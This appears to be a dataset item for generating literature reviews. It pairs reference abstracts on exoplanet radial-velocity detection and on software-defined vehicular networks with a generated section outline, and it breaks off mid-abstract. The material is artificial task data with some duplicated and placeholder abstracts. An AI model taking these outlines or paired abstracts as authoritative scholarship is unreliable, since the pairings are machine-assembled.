--- paper_title: Metallicities & Activities of Southern Stars paper_content: Aims. We present the results from high-resolution spectroscopic measurements to determine metallicities and activities of bright stars in the southern hemisphere. Methods. We measured the iron abundances ((Fe/H)'s) and chromospheric emission indices (loghRHK ) of 353 solar-type stars with V = 7.5−9.5. (Fe/H) abundances are determined using a custom χ 2 fitting procedure within a large grid of Kurucz model atmospheres. The chromospheric activities were determined by measuring the amount of emission in the cores of the strong Caii HK lines. Results. Our comparison of the metallicity sample to other (Fe/H) determinations was found to agree at the ±0.05 dex level for spectroscopic values and at the ±0.1 dex level for photometric values. The distribution of chromospheric activities is described by a bimodal distribution, agreeing with the conclusions from other works. Also an analysis of Maunder minimum status was attempted, and it was found that 6 ± 4 stars in the sample could be in a Maunder minimum phase of their evolution and hence the Sun should only spend a few per cent of its main sequence lifetime in Maunder minimum. --- paper_title: ELODIE: A spectrograph for accurate radial velocity measurements paper_content: The bre{fed echelle spectrograph of Observatoire de Haute{Provence, ELODIE, is presented. This instrument has been in operation since the end of 1993 on the 1.93 m telescope. ELODIE is designed as an updated version of the cross{correlation spectrometer CORAVEL, to perform very accurate radial velocity measurements such as needed in the search, by Doppler shift, for brown{dwarfs or giant planets orbiting around nearby stars. In one single exposure a spectrum at a resolution of 42000 (=) ranging from 3906 A to 6811 Ai s recorded on a 10241024 CCD. This performance is achieved by using a tan = 4 echelle grating and a combination of a prism and a grism as cross{disperser. An automatic on{line data treatment reduces all the ELODIE echelle spectra and computes cross{correlation functions. The instrument design and the data reduction algorithms are described in this paper. The eciency and accuracy of the instrument and its long term instrumental stability allow us to measure radial velocities with an accuracy better than 15 m s 1 for stars up to 9th magnitude in less than 30 minutes exposure time. Observations of 16th magnitude stars are also possible to measure velocities at about 1 km s 1 accuracy. For classic spectroscopic studies (S=N>100) 9th magnitude stars can be observed in one hour exposure time. --- paper_title: Estimation of periods from unequally spaced observations paper_content: A better estimation of the power spectrum of a time series formed with unequally spaced observations may be obtained by means of a data-compensated discrete Fourier transform. This transform is defined so as to include the uneven spacing of the dates of observation and weighting of the corresponding data. The accurate determination of the peak heights allows one to design harmonic filters and thus to make a more certain choice among peaks of similar height and also to discriminate peaks that are just aliases of other peaks. The theory is applied to simulated time series and also to true observational data. --- paper_title: Bayesian Spectrum Analysis and Parameter Estimation paper_content: 1 Introduction.- 2 Single Stationary Sinusoid Plus Noise.- 3 The General Model Equation Plus Noise.- 4 Estimating the Parameters.- 5 Model Selection.- 6 Spectral Estimation.- 7 Applications.- 8 Summary and Conclusions.- A Choosing a Prior Probability.- B Improper Priors as Limits.- C Removing Nuisance Parameters.- D Uninformative Prior Probabilities.- E Computing the "Student t-Distribution". --- paper_title: Studies in astronomical time series analysis. II - Statistical aspects of spectral analysis of unevenly spaced data paper_content: Detection of a periodic signal hidden in noise is frequently a goal in astronomical data analysis. This paper does not introduce a new detection technique, but instead studies the reliability and efficiency of detection with the most commonly used technique, the periodogram, in the case where the observation times are unevenly spaced. This choice was made because, of the methods in current use, it appears to have the simplest statistical behavior. A modification of the classical definition of the periodogram is necessary in order to retain the simple statistical behavior of the evenly spaced case. With this modification, periodogram analysis and least-squares fitting of sine waves to the data are exactly equivalent. Certain difficulties with the use of the periodogram are less important than commonly believed in the case of detection of strictly periodic signals. In addition, the standard method for mitigating these difficulties (tapering) can be used just as well if the sampling is uneven. An analysis of the statistical significance of signal detections is presented, with examples --- paper_title: Keplerian periodogram for Doppler exoplanets detection: optimized computation and analytic significance thresholds paper_content: We consider the so-called Keplerian periodogram, in which the putative detectable signal is modelled by a highly non-linear Keplerian radial velocity function, appearing in Doppler exoplanetary surveys. We demonstrate that for planets on high-eccentricity orbits the Keplerian periodogram is far more efficient than the classic Lomb-Scargle periodogram and even the multiharmonic periodograms, in which the periodic signal is approximated by a truncated Fourier series. We provide new numerical algorithm for computation of the Keplerian periodogram. This algorithm adaptively increases the parameteric resolution where necessary, in order to uniformly cover all local optima of the Keplerian fit. Thanks to this improvement, the algorithm provides more smooth and reliable results with minimized computing demands. We also derive a fast analytic approximation to the false alarm probability levels of the Keplerian periodogram. This approximation has the form $(P z^{3/2} + Q z) W \exp(-z)$, where $z$ is the observed periodogram maximum, $W$ is proportional to the settled frequency range, and the coefficients $P$ and $Q$ depend on the maximum eccentricity to scan. --- paper_title: Period04: A software package to extract multiple frequencies from real data paper_content: Period04, a reworked and extended version of Period98 (Sperl 1998) and PERIOD/ PERDET (Breger 1990), is a new software package especially dedicated to the statistical analysis of large astronomical data sets containing gaps. It offers tools to extract the individual frequencies from the multiperiodic content of time series and provides a flexible interface to perform multiple-frequency fits. A review of the functions of Period04 is given. --- paper_title: A dynamically-packed planetary system around GJ667C with three super-Earths in its habitable zone paper_content: Guillen Anglada-Escude, et al, 'A dynamically-packed planetary system around GJ 667J with three super-Earths in its habitable zone', A&A, Vol. 556, A126, first published online 7 August 2013. The version of record is available at doi: http://doi.org/10.1051/0004-6361/201321331. © ESO 2013. Reproduced with permission from Astronomy & Astrophysics. Published by EDP Sciences --- paper_title: PlanetPack: a radial-velocity time-series analysis tool facilitating exoplanets detection, characterization, and dynamical simulations paper_content: Abstract We present PlanetPack, a new software tool that we developed to facilitate and standardize the advanced analysis of radial velocity (RV) data for the goal of exoplanets detection, characterization, and basic dynamical N -body simulations. PlanetPack is a command-line interpreter, that can run either in an interactive mode or in a batch mode of automatic script interpretation. Its major abilities include: (i) advanced RV curve fitting with the proper maximum-likelihood treatment of unknown RV jitter; (ii) user-friendly multi-Keplerian as well as Newtonian N -body RV fits; (iii) use of more efficient maximum-likelihood periodograms that involve the full multi-planet fitting (sometimes called as “residual” or “recursive” periodograms); (iv) easily calculatable parametric 2D likelihood function level contours, reflecting the asymptotic confidence regions; (v) fitting under some useful functional constraints is user-friendly; (vi) basic tasks of short- and long-term planetary dynamical simulation using a fast Everhart-type integrator based on Gauss–Legendre spacings; (vii) fitting the data with red noise (auto-correlated errors); (viii) various analytical and numerical methods for the tasks of determining the statistical significance. It is planned that further functionality may be added to PlanetPack in the future. During the development of this software, a lot of effort was made to improve the calculational speed, especially for CPU-demanding tasks. PlanetPack was written in pure C++ (standard of 1998/2003), and is expected to be compilable and useable on a wide range of platforms. --- paper_title: A new cold sub-Saturnian candidate planet orbiting GJ 221 paper_content: Mikko Tuomi, 'A new cold sub-Saturnian candidate planet orbiting GJ 22', Monthly Notices of the Royal Astronomical Society, Letters, Vol 440: L1-L5, advanced access publication 11 February 2014. The version of record is available at doi: 10.1093/mnrasl/slu014 © 2014 The Author. Published by Oxford University Press on behalf of the Royal Astronomical Society. --- paper_title: An Adaptive Metropolis algorithm paper_content: A proper choice of a proposal distribution for Markov chain Monte Carlo methods, for example for the Metropolis-Hastings algorithm, is well known to be a crucial factor for the convergence of the algorithm. In this paper we introduce an adaptive Metropolis (AM) algorithm, where the Gaussian proposal distribution is updated along the process using the full information cumulated so far. Due to the adaptive nature of the process, the AM algorithm is non-Markovian, but we establish here that it has the correct ergodic properties. We also include the results of our numerical tests, which indicate that the AM algorithm competes well with traditional Metropolis-Hastings algorithms, and demonstrate that the AM algorithm is easy to use in practical computation. --- paper_title: The curious case of HD41248. A pair of static signals buried behind red-noise paper_content: Gaining a better understanding of the effects of stellar induced radial velocity noise is critical for the future of exoplanet studies, since the discovery of the lowest-mass planets using this method will require us to go below the intrinsic stellar noise limit. An interesting test case in this respect is that of the southern solar analogue HD41248. The radial velocity time series of this star has been proposed to contain either a pair of signals with periods of around 18 and 25 days, that could be due to a pair of resonant super-Earths, or a single and varying 25 day signal that could arise due to a complex interplay between differential rotation and modulated activity. In this letter we build-up more evidence for the former scenario, showing that the signals are still clearly significant even after more than 10 years of observations and they likely do not change in period, amplitude, or phase as a function of time, the hallmarks of static Doppler signals. We show that over the last two observing seasons this star was more intrinsically active and the noise reddened, highlighting why better noise models are needed to find the lowest amplitude signals, in particular models that consider noise correlations. This analysis shows that there is still sufficient evidence for the existence of two super-Earths on the edge of, or locked into, a 7:5 mean motion resonance orbiting HD41248. --- paper_title: Radial Velocity Fitting Challenge. I. Simulating the data set including realistic stellar radial-velocity signals paper_content: Stellar signals are the main limitation for precise radial-velocity (RV) measurements. These signals arise from the photosphere of the stars. The m/s perturbation created by these signals prevents the detection and mass characterization of small-mass planetary candidates such as Earth-twins. Several methods have been proposed to mitigate stellar signals in RV measurements. However, without precisely knowing the stellar and planetary signals in real observations, it is extremely difficult to test the efficiency of these methods. The goal of the RV fitting challenge is to generate simulated RV data including stellar and planetary signals and to perform a blind test within the community to test the efficiency of the different methods proposed to recover planetary signals despite stellar signals. In this first paper, we describe the simulation used to model the measurements of the RV fitting challenge. Each simulated planetary system includes the signals from instrumental noise, stellar oscillations, granulation, supergranulation, stellar activity, and observed and simulated planetary systems. In addition to RV variations, this simulation also models the effects of instrumental noise and stellar signals on activity observables obtained by HARPS-type high-resolution spectrographs, that is, the calcium activity index log(R'hk) and the bisector span and full width at half maximum of the cross-correlation function. We publish the 15 systems used for the RV fitting challenge including the details about the planetary systems that were injected into each of them (data available at CDS and here: https://rv-challenge.wikispaces.com. --- paper_title: Detecting multiple periodicities in observational data with the multifrequency periodogram - II. Frequency Decomposer, a parallelized time-series analysis algorithm paper_content: Abstract This is a parallelized algorithm performing a decomposition of a noisy time series into a number of sinusoidal components. The algorithm analyses all suspicious periodicities that can be revealed, including the ones that look like an alias or noise at a glance, but later may prove to be a real variation. After the selection of the initial candidates, the algorithm performs a complete pass through all their possible combinations and computes the rigorous multifrequency statistical significance for each such frequency tuple. The largest combinations that still survived this thresholding procedure represent the outcome of the analysis. The parallel computing on a graphics processing unit (GPU) is implemented through CUDA and brings a significant performance increase. It is still possible to run FREDEC solely on CPU in the traditional single-threaded mode, when no suitable GPU device is available. To verify the practical applicability of our algorithm, we apply it to an artificial time series as well as to some real-life exoplanetary radial-velocity data. We demonstrate that FREDEC can successfully reveal several known exoplanets. Moreover, it detected a new 9.8-day variation in the Lick data for the five-planet system of 55 Cnc. It might indicate the existence of a small sixth planet in the 3:2 commensurability with the planet 55 Cnc b, although this detection is model-dependent and still needs a detailed verification. --- paper_title: A Gaussian process framework for modelling stellar activity signals in radial velocity data paper_content: To date, the radial velocity (RV) method has been one of the most productive techniques for detecting and confirming extrasolar planetary candidates. Unfortunately, stellar activity can induce RV variations which can drown out or even mimic planetary signals - and it is notoriously difficult to model and thus mitigate the effects of these activity-induced nuisance signals. This is expected to be a major obstacle to using next-generation spectrographs to detect lower mass planets, planets with longer periods, and planets around more active stars. Enter Gaussian processes (GPs) which, we note, have a number of attractive features that make them very well suited to disentangling stellar activity signals from planetary signals. We present here a GP framework we developed to model RV time series jointly with ancillary activity indicators (e.g. bisector velocity spans, line widths, chromospheric activity indices), allowing the activity component of RV time series to be constrained and disentangled from e.g. planetary components. We discuss the mathematical details of our GP framework, and present results illustrating its encouraging performance on both synthetic and real RV datasets, including the publicly-available Alpha Centauri B dataset. --- paper_title: Detecting multiple periodicities in observational data with the multi-frequency periodogram. I. Analytic assessment of the statistical significance paper_content: We consider the "multi-frequency" periodogram, in which the putative signal is modelled as a sum of two or more sinusoidal harmonics with idependent frequencies. It is useful in the cases when the data may contain several periodic components, especially when their interaction with each other and with the data sampling patterns might produce misleading results. ::: Although the multi-frequency statistic itself was already constructed, e.g. by G. Foster in his CLEANest algorithm, its probabilistic properties (the detection significance levels) are still poorly known and much of what is deemed known is unrigourous. These detection levels are nonetheless important for the data analysis. We argue that to prove the simultaneous existence of all $n$ components revealed in a multi-periodic variation, it is mandatory to apply at least $2^n-1$ significance tests, among which the most involves various multi-frequency statistics, and only $n$ tests are single-frequency ones. ::: The main result of the paper is an analytic estimation of the statistical significance of the frequency tuples that the multi-frequency periodogram can reveal. Using the theory of extreme values of random fields (the generalized Rice method), we find a handy approximation to the relevant false alarm probability. For the double-frequency periodogram this approximation is given by an elementary formula $\frac{\pi}{16} W^2 e^{-z} z^2$, where $W$ stands for a normalized width of the settled frequency range, and $z$ is the observed periodogram maximum. We carried out intensive Monte Carlo simulations to show that the practical quality of this approximation is satisfactory. A similar analytic expression for the general multi-frequency periodogram is also given in the paper, though with a smaller amount of numerical verification. --- paper_title: Model Order Selection for Complex Sinusoids in the Presence of Unknown Correlated Gaussian Noise paper_content: We consider the problem of detecting and estimating the amplitudes and frequencies of an unknown number of complex sinusoids based on noisy observations from an unstructured array. In parametric detection problems like this, information theoretic criteria such as minimum description length (MDL) and Akaike information criterion (AIC) have previously been used for joint detection and estimation. In our paper, model selection based on extreme value theory (EVT), which has previously been used for enumerating real sinusoidal components from one-dimensional observations, is generalized to the case of multidimensional complex observations in the presence of noise with an unknown spatial correlation matrix. Unlike the previous work, the likelihood ratios considered in the mutlidimensional case cannot be addressed using Gaussian random fields. Instead, chi-square random fields associated with the generalized likelihood ratio test are encountered and EVT is used to analyze the model order overestimation probability for a general class of likelihood penalty terms including MDL and AIC, and a novel likelihood penalty term derived based on EVT. Since the exact EVT penalty term involves a Lambert-W function, an approximate penalty term is also derived that is more tractable. We provide threshold signal-to-noise ratios (SNRs) and show that the model order underestimation probability is asymptotically vanishing for EVT and MDL. We also show that MDL and EVT are asymptotically consistent while AIC is not, and that with finite samples, the detection performance of EVT outperforms MDL and AIC. Finally, the accuracy of the derived threshold SNRs is also demonstrated. --- paper_title: The impact of red noise in radial velocity planet searches: Only three planets orbiting GJ581? paper_content: We perform a detailed analysis of the latest HARPS and Keck radial velocity data for the planet-hosting red dwarf GJ581, which attracted a lot of attention in recent time. We show that these data contain important correlated noise component ("red noise") with the correlation timescale of the order of 10 days. This red noise imposes a lot of misleading effects while we work in the traditional white-noise model. To eliminate these misleading effects, we propose a maximum-likelihood algorithm equipped by an extended model of the noise structure. We treat the red noise as a Gaussian random process with exponentially decaying correlation function. Using this method we prove that: (i) planets b and c do exist in this system, since they can be independently detected in the HARPS and Keck data, and regardless of the assumed noise models; (ii) planet e can also be confirmed independently by the both datasets, although to reveal it in the Keck data it is mandatory to take the red noise into account; (iii) the recently announced putative planets f and g are likely just illusions of the red noise; (iv) the reality of the planet candidate GJ581 d is questionable, because it cannot be detected from the Keck data, and its statistical significance in the HARPS data (as well as in the combined dataset) drops to a marginal level of $\sim 2\sigma$, when the red noise is taken into account. Therefore, the current data for GJ581 really support existence of no more than four (or maybe even only three) orbiting exoplanets. The planet candidate GJ581 d requests serious observational verification. --- paper_title: Bayesian Re-analysis of the Gliese 581 Exoplanet System paper_content: A re-analysis of Gliese 581 HARPS and HIRES precision radial velocity data was carried out with a Bayesian multi-planet Kepler periodogram (from 1 to 6 planets) based on a fusion Markov chain Monte Carlo algorithm. In all cases the analysis included an unknown parameterized stellar jitter noise term. For the HARPS data set the most probable number of planetary signals detected is 5 with a Bayesian false alarm probability of 0.01. These include the $3.1498\pm0.0005$, $5.3687\pm0.0002$, $12.927_{-0.004}^{+0.006}$, and $66.9\pm0.2$d periods reported previously plus a $399_{-16}^{+14}$d period. The orbital eccentricities are $0.0_{-0.0}^{+0.2}$, $0.00_{-0.00}^{+0.02}$, $0.10_{-0.10}^{+0.06}$, $0.33_{-0.10}^{+0.09}$, and $0.02_{-0.02}^{+0.30}$, respectively. The semi-major axis and $M sin i$ of the 5 planets are ($0.0285\pm0.0006$ au, $1.9\pm0.3$M$_{\earth}$), ($0.0406\pm0.0009$ au, $15.7\pm0.7$M$_{\earth}$), ($0.073\pm0.002$ au, $5.3\pm0.4$M$_{\earth}$), ($0.218\pm0.005$ au, $6.7\pm0.8$M$_{\earth}$), and ($0.7\pm0.2$ au, $6.6_{-2.7}^{+2.0}$M$_{\earth}$), respectively. The analysis of the HIRES data set yielded a reliable detection of only the strongest 5.37 and 12.9 day periods. The analysis of the combined HIRES/HARPS data again only reliably detected the 5.37 and 12.9d periods. Detection of 4 planetary signals with periods of 3.15, 5.37, 12.9, and 66.9d was only achieved by including an additional unknown but parameterized Gaussian error term added in quadrature to the HIRES quoted errors. The marginal distribution for the sigma of this additional error term has a well defined peak at $1.8\pm0.4$m s$^{-1}$. It is possible that this additional error arises from unidentified systematic effects. We did not find clear evidence for a fifth planetary signal in the combined HIRES/HARPS data set. --- paper_title: Studies in astronomical time series analysis. II - Statistical aspects of spectral analysis of unevenly spaced data paper_content: Detection of a periodic signal hidden in noise is frequently a goal in astronomical data analysis. This paper does not introduce a new detection technique, but instead studies the reliability and efficiency of detection with the most commonly used technique, the periodogram, in the case where the observation times are unevenly spaced. This choice was made because, of the methods in current use, it appears to have the simplest statistical behavior. A modification of the classical definition of the periodogram is necessary in order to retain the simple statistical behavior of the evenly spaced case. With this modification, periodogram analysis and least-squares fitting of sine waves to the data are exactly equivalent. Certain difficulties with the use of the periodogram are less important than commonly believed in the case of detection of strictly periodic signals. In addition, the standard method for mitigating these difficulties (tapering) can be used just as well if the sampling is uneven. An analysis of the statistical significance of signal detections is presented, with examples --- paper_title: A Hot Uranus Orbiting the Super Metal-rich Star HD77338 and the Metallicity - Mass Connection paper_content: We announce the discovery of a low-mass planet orbiting the super metal-rich K0V star HD77338 as part of our on-going Calan-Hertfordshire Extrasolar Planet Search. The best fit planet solution has an orbital period of 5.7361\pm0.0015 days and with a radial velocity semi-amplitude of only 5.96\pm1.74 m/s, we find a minimum mass of 15.9+4.7-5.3 Me. The best fit eccentricity from this solution is 0.09+0.25-0.09, and we find agreement for this data set using a Bayesian analysis and a periodogram analysis. We measure a metallicity for the star of +0.35\pm0.06 dex, whereas another recent work (Trevisan et al. 2011) finds +0.47\pm0.05 dex. Thus HD77338b is one of the most metal-rich planet host stars known and the most metal-rich star hosting a sub-Neptune mass planet. We searched for a transit signature of HD77338b but none was detected. We also highlight an emerging trend where metallicity and mass seem to correlate at very low masses, a discovery that would be in agreement with the core accretion model of planet formation. The trend appears to show that for Neptune-mass planets and below, higher masses are preferred when the host star is more metal-rich. Also a lower boundary is apparent in the super metal-rich regime where there are no very low-mass planets yet discovered in comparison to the sub-solar metallicity regime. A Monte Carlo analysis shows that this, low-mass planet desert, is statistically significant with the current sample of 36 planets at around the 4.5\sigma\ level. In addition, results from Kepler strengthen the claim for this paucity of the lowest-mass planets in super metal-rich systems. Finally, this discovery adds to the growing population of low-mass planets around low-mass and metal-rich stars and shows that very low-mass planets can now be discovered with a relatively small number of data points using stable instrumentation. --- paper_title: Parameter Estimation from Time-Series Data with Correlated Errors: A Wavelet-Based Method and its Application to Transit Light Curves paper_content: We consider the problem of fitting a parametric model to time-series data that are afflicted by correlated noise. The noise is represented by a sum of two stationary Gaussian processes: one that is uncorrelated in time, and another that has a power spectral density varying as $1/f^\gamma$. We present an accurate and fast [O(N)] algorithm for parameter estimation based on computing the likelihood in a wavelet basis. The method is illustrated and tested using simulated time-series photometry of exoplanetary transits, with particular attention to estimating the midtransit time. We compare our method to two other methods that have been used in the literature, the time-averaging method and the residual-permutation method. For noise processes that obey our assumptions, the algorithm presented here gives more accurate results for midtransit times and truer estimates of their uncertainties. ---
Title: Discovering New Worlds: A review of signal processing methods for detecting exoplanets from astronomical radial velocity data [Applications Corner] Section 1: Introduction Description 1: Introduce the concept of exoplanets and the importance of their detection using signal processing methods, particularly focusing on the radial velocity method. Section 2: Radial Velocity Method Description 2: Explain how the radial velocity method works for detecting exoplanets, including the challenges involved and the process of obtaining and analyzing radial velocity data. Section 3: LS Periodogram Description 3: Discuss the Lomb-Scargle (LS) periodogram method used in signal detection, including its implementation, advantages, and limitations. Section 4: Keplerian Periodogram Description 4: Describe the Keplerian periodogram method, highlighting its differences from the LS method, its robustness, and its application in detecting exoplanetary systems. Section 5: Prewhitening Method Description 5: Outline the prewhitening method for searching Doppler signals in radial velocity time series, including how it works and its strengths and weaknesses. Section 6: ML Periodograms Description 6: Explain the Maximum-Likelihood (ML) periodogram method, including its process, advantages, and how it accommodates multiple signals and correlated noise components. Section 7: Bayesian Analysis Description 7: Discuss the Bayesian analysis approach for signal detection, its robustness, flexibility, and the use of Markov chains to assess parameter space. Section 8: MMSE-based Method Description 8: Describe the Minimum Mean Square Error (MMSE)-based method for detecting signals in nonuniformly sampled radial velocity data, including its application and advantages. Section 9: Statistical Significance of Signal Detection Description 9: Elaborate on the importance of statistical validation in signal detection, including methods like False Alarm Probability (FAP) and bootstrap analysis. Section 10: Potential Directions for Future Research Description 10: Highlight future research directions for improving the detection of exoplanets, such as better calibration, understanding stellar activity impacts, and advancements in signal processing methods.
A Survey on Software-Defined VANETs: Benefits, Challenges, and Future Directions
20
--- paper_title: Maturing of OpenFlow and Software Defined Networking through Deployments paper_content: Software-defined Networking (SDN) has emerged as a new paradigm of networking that enables network operators, owners, vendors, and even third parties to innovate and create new capabilities at a faster pace. The SDN paradigm shows potential for all domains of use, including data centers, cellular providers, service providers, enterprises, and homes. Over a three-year period, we deployed SDN technology at our campus and at several other campuses nation-wide with the help of partners. These deployments included the first-ever SDN prototype in a lab for a (small) global deployment. The four-phased deployments and demonstration of new networking capabilities enabled by SDN played an important role in maturing SDN and its ecosystem. We share our experiences and lessons learned that have to do with demonstration of SDN's potential; its influence on successive versions of OpenFlow specification; evolution of SDN architecture; performance of SDN and various components; and growing the ecosystem. --- paper_title: Vehicle Ad Hoc networks: applications and related technical issues paper_content: This article presents a comprehensive survey of the state-of-the-art for vehicle ad hoc networks. We start by reviewing the possible applications that can be used in VANETs, namely, safety and user applications, and by identifying their requirements. Then, we classify the solutions proposed in the literature according to their location in the open system interconnection reference model and their relationship to safety or user applications. We analyze their advantages and shortcomings and provide our suggestions for a better approach. We also describe the different methods used to simulate and evaluate the proposed solutions. Finally, we conclude with suggestions for a general architecture that can form the basis for a practical VANET. --- paper_title: Software-Defined Networking for Internet of Things: A Survey paper_content: Internet of things (IoT) facilitates billions of devices to be enabled with network connectivity to collect and exchange real-time information for providing intelligent services. Thus, IoT allows connected devices to be controlled and accessed remotely in the presence of adequate network infrastructure. Unfortunately, traditional network technologies such as enterprise networks and classic timeout-based transport protocols are not capable of handling such requirements of IoT in an efficient, scalable, seamless, and cost-effective manner. Besides, the advent of software-defined networking (SDN) introduces features that allow the network operators and users to control and access the network devices remotely, while leveraging the global view of the network. In this respect, we provide a comprehensive survey of different SDN-based technologies, which are useful to fulfill the requirements of IoT, from different networking aspects— edge , access , core , and data center networking. In these areas, the utility of SDN-based technologies is discussed, while presenting different challenges and requirements of the same in the context of IoT applications. We present a synthesized overview of the current state of IoT development. We also highlight some of the future research directions and open research issues based on the limitations of the existing SDN-based technologies. --- paper_title: CloudMAC: towards software defined WLANs paper_content: Traditional enterprise WLAN management systems are hard to extend and require powerful access points (APs). In this paper we introduce and evaluate CloudMAC, an architecture for enterprise WLANs in which MAC frames are generated and processed on virtual APs hosted in a datacenter. The APs only need to forward MAC frames. The APs and the servers are connected via an OpenFlow-enabled network, which allows to control where and how MAC frames are transmitted. --- paper_title: Advertising in the IoT Era: Vision and Challenges paper_content: The IoT extends the idea of interconnecting computers to a plethora of different devices, collectively referred to as smart devices. These are physical items, that is, "things", such as wearable devices, home appliances, and vehicles, enriched with computational and networking capabilities. Due to the huge set of devices involved, and therefore its pervasiveness, IoT is a great platform to leverage for building new applications and services or extending existing ones. In this regard, expanding online advertising into the IoT realm is an under-investigated yet promising research direction, especially considering that the traditional Internet advertising market is already worth hundreds of billions of dollars. In this article, we first propose the architecture of an IoT advertising platform inspired by the well known business ecosystem, which the traditional Internet advertising is based on. Additionally, we discuss the key challenges to implement such a platform, with a special focus on issues related to architecture, advertisement content delivery, security, and privacy of the users. --- paper_title: OpenRoads: empowering research in mobile networks paper_content: We present OpenRoads, an open-source platform for innovation in mobile networks. OpenRoads enable researchers to innovate using their own production networks, through providing an wireless extension OpenFlow. Therefore, you can think of OpenRoads as "OpenFlow Wireless". The OpenRoads' architecture consists of three layers: flow, slicing and controller. These layers provide flexible control, virtualization and high-level abstraction. This allows researchers to implement wildly different algorithms and run them concurrently in one network. OpenRoads also incorporates multiple wireless technologies, specifically WiFi and WiMAX. We have deployed OpenRoads, and used it as our production network. Our goal here is for those to deploy OpenRoads and build their own experiments on it. --- paper_title: Vehicle Ad Hoc networks: applications and related technical issues paper_content: This article presents a comprehensive survey of the state-of-the-art for vehicle ad hoc networks. We start by reviewing the possible applications that can be used in VANETs, namely, safety and user applications, and by identifying their requirements. Then, we classify the solutions proposed in the literature according to their location in the open system interconnection reference model and their relationship to safety or user applications. We analyze their advantages and shortcomings and provide our suggestions for a better approach. We also describe the different methods used to simulate and evaluate the proposed solutions. Finally, we conclude with suggestions for a general architecture that can form the basis for a practical VANET. --- paper_title: Security challenges in vehicular cloud computing paper_content: In a series of recent papers, Prof. Olariu and his co-workers have promoted the vision of vehicular clouds (VCs), a nontrivial extension, along several dimensions, of conventional cloud computing. In a VC, underutilized vehicular resources including computing power, storage, and Internet connectivity can be shared between drivers or rented out over the Internet to various customers. Clearly, if the VC concept is to see a wide adoption and to have significant societal impact, security and privacy issues need to be addressed. The main contribution of this work is to identify and analyze a number of security challenges and potential privacy threats in VCs. Although security issues have received attention in cloud computing and vehicular networks, we identify security challenges that are specific to VCs, e.g., challenges of authentication of high-mobility vehicles, scalability and single interface, tangled identities and locations, and the complexity of establishing trust relationships among multiple players caused by intermittent short-range communications. Additionally, we provide a security scheme that addresses several of the challenges discussed. --- paper_title: 1 Communication Patterns in VANETs paper_content: Vehicular networks are a very promising technology to increase traffic safety and efficiency, and to enable numerous other applications in the domain of vehicular communication. Proposed applications for VANETs have very diverse properties and often require nonstandard communication protocols. Moreover, the dynamics of the network due to vehicle movement further complicates the design of an appropriate comprehensive communication system. In this article we collect and categorize envisioned applications from various sources and classify the unique network characteristics of vehicular networks. Based on this analysis, we propose five distinct communication patterns that form the basis of almost all VANET applications. Both the analysis and the communication patterns shall deepen the understanding of VANETs and simplify further development of VANET communication systems. --- paper_title: Fast and Secure Multihop Broadcast Solutions for Intervehicular Communication paper_content: Intervehicular communication (IVC) is an important emerging research area that is expected to considerably contribute to traffic safety and efficiency. In this context, many possible IVC applications share the common need for fast multihop message propagation, including information such as position, direction, and speed. However, it is crucial for such a data exchange system to be resilient to security attacks. Conversely, a malicious vehicle might inject incorrect information into the intervehicle wireless links, leading to life and money losses or to any other sort of adversarial selfishness (e.g., traffic redirection for the adversarial benefit). In this paper, we analyze attacks to the state-of-the-art IVC-based safety applications. Furthermore, this analysis leads us to design a fast and secure multihop broadcast algorithm for vehicular communication, which is proved to be resilient to the aforementioned attacks. --- paper_title: Towards software-defined VANET: Architecture and services paper_content: Vehicular Ad Hoc Networks (VANETs) have in recent years been viewed as one of the enabling technologies to provide a wide variety of services, such as vehicle road safety, enhanced traffic and travel efficiency, and convenience and comfort for passengers and drivers. However, current VANET architectures lack in flexibility and make the deployment of services/protocols in large-scale a hard task. In this paper, we demonstrate how Software-Defined Networking (SDN), an emerging network paradigm, can be used to provide the flexibility and programmability to networks and introduces new services and features to today's VANETs. We take the concept of SDN, which has mainly been designed for wired infrastructures, especially in the data center space, and propose SDN-based VANET architecture and its operational mode to adapt SDN to VANET environments. We also discuss benefits of a Software-Defined VANET and the services that can be provided. We demonstrate in simulation the feasibility of a Software-Defined VANET by comparing SDN-based routing with traditional MANET/VANET routing protocols. We also show in simulation fallback mechanisms that must be provided to apply the SDN concept into mobile wireless scenarios, and demonstrate one of the possible services that can be provided by a Software-Defined VANET. --- paper_title: The position cheating attack on inter-vehicular online gaming paper_content: New in-car communications and entertainment systems have emerged, enabling interconnection of various components in vehicles (e.g., TVs, CD/DVD players, media players, and cell phones). With the new advances of automotive industry, car passengers embody the next consumers that will be targeted by online game providers. In this context, researchers on online games demonstrated the importance of the network's performance in determining the quality level perceived by consumers. Enabling games over Vehicular Ad hoc Networks (VANET) will require the design of secure architectures against threats, in order to not jeopardize the effectiveness of online gaming over VANET. These threats could increase the delivery delay of game events, leading to the unsatisfaction of passengers. In this paper, we address security threats for online gaming over VANET. In particular, we focus on a representative vehicular broadcast algorithm, and we discuss a cheating threat. Indeed, the attacker could use the location-aware game message exchange to cheat about his position, thus enforcing game events to be delayed, and reduce the quality of service. Finally, we run a thorough set of simulations to assess the impact of the position cheating attack to the online gaming over VANET. --- paper_title: Vehicle Software Updates Distribution with SDN and Cloud Computing paper_content: Vehicles have embedded software dedicated to diverse functionality ranging from driving assistance to entertainment. Vehicle manufacturers often need to perform updates on software installed on vehicles. Software updates can either be pushed by the manufacturer to install fixes, or be requested by vehicle owners to upgrade some functionality. We propose an architecture for distributing software updates on vehicles based on SDN and cloud computing. We show that using SDN, the emergent networking paradigm, which provides on-demand network programmability, adds substantial flexibility for deploying software updates on vehicles. We propose solutions for how vehicular networks can be modeled as connectivity graphs that can be used as input for the SDN architecture. After constructing graphs, we present an SDN-based solution where different frequency bands are assigned to different graph edges to improve the network performance. --- paper_title: SDVN: enabling rapid network innovation for heterogeneous vehicular communication paper_content: With the advances in telecommunications, more and more devices are connected to the Internet and getting smart. As a promising application scenario for carrier networks, vehicular communication has enabled many traffic-related applications. However, the heterogeneity of wireless infrastructures and the inflexibility in protocol deployment hinder the real world application of vehicular communications. SDN is promising to bridge the gaps through unified network abstraction and programmability. In this research, we propose an SDN-based architecture to enable rapid network innovation for vehicular communications. Under this architecture, heterogeneous wireless devices, including vehicles and roadside units, are abstracted as SDN switches with a unified interface. In addition, network resources such as bandwidth and spectrum can also be allocated and assigned by the logically centralized control plane, which provides a far more agile configuration capability. Besides, we also study several cases to highlight the advantages of the architecture, such as adaptive protocol deployment and multiple tenants isolation. Finally, the feasibility and effectiveness of the proposed architecture and cases are validated through traffic-trace-based simulation. --- paper_title: The impact of malicious nodes positioning on vehicular alert messaging system paper_content: ICT components of vehicular and transportation systems have a crucial role in ensuring passengers' safety, particularly in the scenario of vehicular networks. Hence, security concerns should not be overlooked, since a malicious vehicle might inject false information into the intervehicle wireless links, leading to 